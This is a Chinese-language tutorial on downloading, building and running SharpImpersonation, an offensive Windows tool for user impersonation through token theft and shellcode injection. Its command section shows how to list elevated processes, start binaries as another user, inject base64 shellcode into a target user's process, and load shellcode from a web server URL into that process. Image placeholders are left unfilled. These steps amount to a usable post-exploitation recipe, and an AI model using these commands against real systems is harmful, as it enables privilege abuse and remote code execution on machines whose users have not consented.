SharpImpersonation 项目下载及安装教程

1. 项目介绍

SharpImpersonation 是一个用户模拟工具，它通过 Token 或 Shellcode 注入的方式实现用户权限的模拟。该项目基于一些知名技术构建而成，并在某些方面对其他公开工具进行了改进。SharpImpersonation 的代码基础来自于 Tokenvator 项目。

2. 项目下载位置

您可以在以下位置找到 SharpImpersonation 的开源代码：

GitHub: https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git

3. 项目安装环境配置

在安装 SharpImpersonation 之前，请确保您的系统满足以下环境要求：

• 操作系统：Windows
• .NET 版本：4.6.1 或更高版本

以下为环境配置的示例图片：

注意：请将 image_path_1.png 替换为实际的图片路径。

4. 项目安装方式

安装 SharpImpersonation 的步骤如下：

1. 克隆项目到本地：

   git clone https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git
   

2. 使用 Visual Studio 打开 SharpImpersonation.sln 解决方案文件。

3. 确保您的项目配置正确，并编译项目。

4. 编译成功后，在输出目录中找到 SharpImpersonation.exe 文件。

5. 项目处理脚本

以下是 SharpImpersonation 的几个常用命令示例：

列出用户进程

PS C:\temp> SharpImpersonation.exe list

注意：请将 image_path_2.png 替换为实际的图片路径。

列出仅提升的进程

PS C:\temp> SharpImpersonation.exe list elevated

模拟目标用户启动新二进制文件

PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

将 base64 编码的 shellcode 注入目标用户的第一个进程

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

从网页服务器加载 shellcode 到目标用户的第一个进程

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

通过 ImpersonateLoggedOnUser 技术模拟目标用户当前会话

PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

请注意替换 <user>、<binary-Path>、<base64shellcode> 和 <URL> 为实际的用户名、二进制路径、base64 编码的 shellcode 和 URL。